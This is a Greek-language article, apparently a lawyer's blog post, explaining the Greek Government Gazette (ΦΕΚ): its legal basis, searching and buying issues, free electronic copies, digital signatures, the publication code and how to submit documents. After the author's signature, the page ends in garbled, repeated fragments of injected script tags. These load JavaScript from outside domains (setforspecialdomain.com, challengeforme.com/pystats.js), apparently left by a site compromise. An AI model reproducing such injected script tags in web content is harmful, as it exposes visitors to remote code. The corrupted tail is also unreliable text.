Πόσα αλήθεια γνωρίζετε για το Φύλλο της Εφημερίδας Κυβερνήσεως;

Πόσα αλήθεια γνωρίζετε για το Φύλλο της Εφημερίδας Κυβερνήσεως;

Για να πάρετε πληροφορίες για κάποιο ΦΕΚ, μπορείτε να επισκεφτείτε την αντίστοιχη σελίδα ΑΝΑΖΗΤΗΣΕΙΣ της Ιστοσελίδας του Εθνικού Τυπογραφείου .

Η Εφημερίδα της Κυβερνήσεως (Φ.Ε.Κ.) εκδίδεται σύμφωνα με το Ν.3469 (τεύχος Α’ 131/ 28.6.2006) “Εθνικό Τυπογραφείο, Εφημερίς της Κυβερνήσεως και λοιπές διατάξεις”. Η διάκριση σε τεύχη γίνεται από το περιεχόμενο των θεμάτων της.

Για να πάρετε πληροφορίες για κάποιο ΦΕΚ, μπορείτε να επισκεφτείτε την αντίστοιχη σελίδα ΑΝΑΖΗΤΗΣΕΙΣ της Ιστοσελίδας του Εθνικού Τυπογραφείου .

Κατά τις εργάσιμες ημέρες και ώρες ( Δευτ-Παρ 8:00 – 13:30) μπορείτε να απευθυνθείτε στο Τμήμα Πληροφοριών (Καποδιστρίου 34, Ισόγειο, Γραφείο 3) ή να επικοινωνήσετε τηλεφωνικά με το τηλεφωνικό κέντρο για την εξυπηρέτηση πολιτών στο τηλ.210-5279000. Μπορείτε να προμηθευτείτε τα Φύλλα της Εφημερίδας της Κυβερνήσεως, σε έντυπη μορφή των ΦΕΚ , μπορείτε να απευθυνθείτε στο Τμήμα Πωλήσεων: Καποδιστρίου 34 – Αθήνα, τηλ. 210 5279178-9

Για την ηλεκτρονική μορφή των ΦΕΚ:

Tα Φ.Ε.Κ. σε ηλεκτρονική μορφή είναι πλέον διαθέσιμα ΔΩΡΕΑΝ από την ιστοσελίδα του Εθνικού Τυπογραφείου. (Ν.3861/2010,άρθρο 7 /τ.Α΄112 -13.7.2010).

Μπορείτε να αγοράσετε ΦΕΚ σε cd/dvd από το Τμήμα Πωλήσεων κατόπιν παραγγελίας.

Θα πρέπει επίσης να επισημάνουμε ότι υπάρχει ψηφιακή υπογραφή που είναι ένα ψηφιακό πιστοποιητικό αυθεντικότητας των Φύλλων της Εφημερίδας της Κυβερνήσεως έτσι προκειμένου να πιστοποιείται η μη αλλοίωση των περιεχομένων των ηλεκτρονικών ΦΕΚ. Η ψηφιακή υπογραφή είναι μοναδική, ισχύει μόνο για το ηλεκτρονικό αρχείο ΦΕΚ και εγκαθίσταται σε όλα τα ΦΕΚ από το 2006 έως σήμερα.

Θα πρέπει όμως να επισημανθεί το γεγονός ότι η ψηφιακή υπογραφή ισχύει μόνο για το ηλεκτρονικό ΦΕΚ επειδή η εγκυρότητά της αποδεικνύεται αποκλειστικά με ηλεκτρονικό τρόπο.

ΠΡΟΣΟΧΗ!

Σε καμία περίπτωση δεν μπορεί να χρησιμοποιηθεί για να πιστοποιήσει την εγκυρότητα του έντυπου ΦΕΚ που προήλθε από εκτύπωση του αντίστοιχου ηλεκτρονικού ΦΕΚ.

Για να παρακολουθήσετε την πορεία του δημοσιεύματος τηλεφωνικά ή μέσω της Ιστοσελίδας από την αντίστοιχη σελίδα αναζήτησης, μπορείτε να κάνετε χρήση του Κωδικού Αριθμού Δημοσιεύματος (ΚΑΔ).

Ο Κωδικός αριθμός Δημοσιεύματος (Κ.Α.Δ.) είναι ο αρ.πρωτοκόλλου που εκδίδει το Εθνικό Τυπογραφείο για το κατατιθέμενο έγγραφο προς δημοσίευση και αποτελείται από ένα διακριτικό γράμμα (Δ ή Ε) , ένα αριθμητικό πεδίο και την ημερομηνία

Επίσης, χρήσιμο είναι να δούμε τη διαδικασία κατάθεσης εγγράφων για δημοσίευση σε ΦΕΚ .

H κατάθεση των εγγράφων προς δημοσίευση σε ΦΕΚ γίνεται στο Γραφείο Πρωτοκόλλου-Τμήμα Α1 Παραλαβής Δημοσιευτέας Ύλης (Καποδιστρίου 34, Ισόγειο). Τα έγγραφα πρέπει να είναι πρωτότυπα και όταν το κείμενο ξεπερνά την μία σελίδα πρέπει να συνοδεύονται υποχρεωτικά από δισκέτα ή cd-rom με το πλήρες κείμενο του εγγράφου σε ηλεκτρονική μορφή. Εφόσον απαιτούνται τέλη δημοσίευσης, θα πρέπει μαζί με το έγγραφο προς δημοσίευση να κατατίθεται και το πρωτότυπο διπλότυπο είσπραξης των τελών δημοσίευσης. Αποδεικτικό της κατάθεσης αποτελεί ο Κωδικός αριθμός Δημοσιεύματος (Κ.Α.Δ.).

 

Χρύσα Τσιώτση

Δικηγόρος

chryssa.tsiotsi@gmail.com___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >